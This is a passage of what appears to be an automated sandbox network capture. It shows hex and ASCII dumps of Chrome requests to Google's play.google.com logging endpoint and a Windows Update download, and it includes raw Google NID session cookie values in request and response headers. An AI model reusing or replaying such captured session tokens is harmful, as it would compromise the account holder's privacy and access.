                                                                                                                    Data Ascii: th||delete this[0][k.id],k.Xe.Pk.next=k.Xe.next,k.Xe.next.Pk=k.Xe.Pk,k.Xe.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Pk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).Xe};c.prototype.get=function
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e
                                                                                                                    Data Ascii: c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||f.value[0].x!=4||f.value[1]!=f.value[0]?!1:e.n
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 3a 28 65 2d 3d 36 35 35 33 36 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 26 31 30 32 33 7c 35 36 33 32 30 29 29 7d 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6d 61
                                                                                                                    Data Ascii: ;d++){var e=Number(arguments[d]);if(e<0||e>1114111||e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e):(e-=65536,c+=String.fromCharCode(e>>>10&1023|55296),c+=String.fromCharCode(e&1023|56320))}return c}});ma


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449776172.217.19.2064432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:26 UTC1005OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                    Host: play.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    Content-Length: 4086
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                    X-Goog-AuthUser: 0
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Accept: */*
                                                                                                                    Origin: https://sites.google.com
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Referer: https://sites.google.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
                                                                                                                    2024-11-25 18:52:26 UTC4086OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 2d 55 53 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 32 30 33 33 2c 5b 5b 22 31 37 33 32 35 36 30 37 34 31 31 34 31 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 5b 5b 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 2c 31 37 33 32 35 36 30 37 34 31 31 33 39 30 30 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 37 33 32 35 36 30 37 34 31 31 33 39 30 30 30 5d 2c 6e 75 6c 6c 2c 31 5d 2c 6e 75 6c 6c 2c 37 31 36 2c 6e 75 6c 6c 2c
                                                                                                                    Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en-US",null,null,null,null,[4,0,0,0,0]]],2033,[["1732560741141",null,null,null,null,null,null,"[[[null,null,1,1732560741139000,null,null,null,[[1732560741139000],null,1],null,716,null,
                                                                                                                    2024-11-25 18:52:27 UTC943INHTTP/1.1 200 OK
                                                                                                                    Access-Control-Allow-Origin: https://sites.google.com
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                    Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                    Set-Cookie: NID=519=lfnz-h9w4v30OY_tcc_TmPU4OC1amR6gPPpSDMXGrjBiTZpW2U0SRPj_6EKYWq4TmLYYslTn75u0Guf-EHyc-CT450RGPSVyRWU61VJ7GBi44QhdoQr8JGDWs6dskmz7Vc9c_pY7CQMCUzBY4k6Q5bWs5ihSz8NVo052UGCmRKlWp337UVfWbjYt_R5zGtvn; expires=Tue, 27-May-2025 18:52:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:26 GMT
                                                                                                                    Server: Playlog
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Accept-Ranges: none
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Mon, 25 Nov 2024 18:52:26 GMT
                                                                                                                    Cache-Control: private
                                                                                                                    Connection: close
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    2024-11-25 18:52:27 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                    Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                    2024-11-25 18:52:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449778172.217.19.2064432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:26 UTC1005OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                    Host: play.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    Content-Length: 5165
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                    X-Goog-AuthUser: 0
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Accept: */*
                                                                                                                    Origin: https://sites.google.com
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Referer: https://sites.google.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
                                                                                                                    2024-11-25 18:52:26 UTC5165OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 2d 55 53 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 32 30 33 33 2c 5b 5b 22 31 37 33 32 35 36 30 37 34 34 33 34 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e
                                                                                                                    Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en-US",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0,0,0]]],2033,[["1732560744343",null,null,n
                                                                                                                    2024-11-25 18:52:27 UTC943INHTTP/1.1 200 OK
                                                                                                                    Access-Control-Allow-Origin: https://sites.google.com
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                    Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                    Set-Cookie: NID=519=VtVOjXt6zuhy-2YKtTERKDmpWoK0o-Dj_kJNfbc4lzsHckeG-pox1jah9rbPwMfgsCbFlReKUmAtgYnXmJ2O0IA7HHWm8Hq8HDUMgvf80mMHXbVBw5H4uNG50lSf57Ofx3gSXdLSNi9i42fTEUs34VcDQXfj8bzivXWpPGJg99XByGFGMXxxp0FNZbckcA28; expires=Tue, 27-May-2025 18:52:27 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:27 GMT
                                                                                                                    Server: Playlog
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Accept-Ranges: none
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Mon, 25 Nov 2024 18:52:27 GMT
                                                                                                                    Cache-Control: private
                                                                                                                    Connection: close
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    2024-11-25 18:52:27 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                    Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                    2024-11-25 18:52:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.44977552.149.20.212443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+t9dwrlzm24OzzO&MD=yBmHFA61 HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                    2024-11-25 18:52:27 UTC560INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Expires: -1
                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                    MS-CorrelationId: f27510ac-d3e7-487d-9d42-bb038f64578a
                                                                                                                    MS-RequestId: 4ff5e77d-d38f-4e82-8dd5-c003426ce655
                                                                                                                    MS-CV: DF1i2kP710ibC0+G.0
                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:26 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 24490
                                                                                                                    2024-11-25 18:52:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                    2024-11-25 18:52:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449783172.217.19.2384432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:29 UTC685OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                    Host: play.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: */*
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=lfnz-h9w4v30OY_tcc_TmPU4OC1amR6gPPpSDMXGrjBiTZpW2U0SRPj_6EKYWq4TmLYYslTn75u0Guf-EHyc-CT450RGPSVyRWU61VJ7GBi44QhdoQr8JGDWs6dskmz7Vc9c_pY7CQMCUzBY4k6Q5bWs5ihSz8NVo052UGCmRKlWp337UVfWbjYt_R5zGtvn
                                                                                                                    2024-11-25 18:52:29 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:29 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Server: Playlog
                                                                                                                    Content-Length: 1555
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:29 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
                                                                                                                    2024-11-25 18:52:29 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                    Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449788172.217.19.2384432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:31 UTC685OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                    Host: play.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: */*
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=VtVOjXt6zuhy-2YKtTERKDmpWoK0o-Dj_kJNfbc4lzsHckeG-pox1jah9rbPwMfgsCbFlReKUmAtgYnXmJ2O0IA7HHWm8Hq8HDUMgvf80mMHXbVBw5H4uNG50lSf57Ofx3gSXdLSNi9i42fTEUs34VcDQXfj8bzivXWpPGJg99XByGFGMXxxp0FNZbckcA28
                                                                                                                    2024-11-25 18:52:32 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:32 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Server: Playlog
                                                                                                                    Content-Length: 1555
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:32 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
